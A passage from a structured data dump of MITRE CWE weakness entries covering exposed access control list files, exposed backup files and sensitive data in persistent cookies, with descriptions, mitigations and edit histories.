"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-12-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Core Dump Files",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"528"
],
[
"284",
"285",
"552",
"528"
]
] |
[] |
529
|
Exposure of Access Control List Files to an Unauthorized Control Sphere
|
Variant
|
Simple
|
Incomplete
|
The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere.
|
Exposure of these access control list files may give the attacker information about the configuration of the site or system. This information may then be used to bypass the intended security policy or identify trusted systems from which an attack can be launched.
| null | null |
[
{
"Note": "OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.",
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Access Control"
]
}
] |
[
{
"Description": "Protect access control list files.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-12-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Access Control List Files",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"529"
],
[
"284",
"285",
"552",
"529"
]
] |
[] |
530
|
Exposure of Backup File to an Unauthorized Control Sphere
|
Variant
|
Simple
|
Incomplete
|
A backup file is stored in a directory or archive that is made accessible to unauthorized actors.
|
Often, older backup files are renamed with an extension such as .~bk to distinguish them from production files. The source code for old files that have been renamed in this manner and left in the webroot can often be retrieved. This renaming may have been performed automatically by the web server, or manually by the administrator.
| null | null |
[
{
"Note": "OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.",
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": "At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site.",
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Recommendations include implementing a security policy within your organization that prohibits backing up web application source code in the webroot.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Policy"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-12-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Backup (.~bk) Files",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"530"
],
[
"284",
"285",
"552",
"530"
]
] |
[] |
539
|
Use of Persistent Cookies Containing Sensitive Information
|
Variant
|
Simple
|
Incomplete
|
The web application uses persistent cookies, but the cookies contain sensitive information.
|
Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser's memory and are not stored anywhere, but persistent cookies are stored on the browser's hard drive. This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed.
| null | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Do not store sensitive information in persistent cookies.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null |
[
"21",
"31",
"39",
"59",
"60"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Other_Notes",
"ModificationDate": "2010-09-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
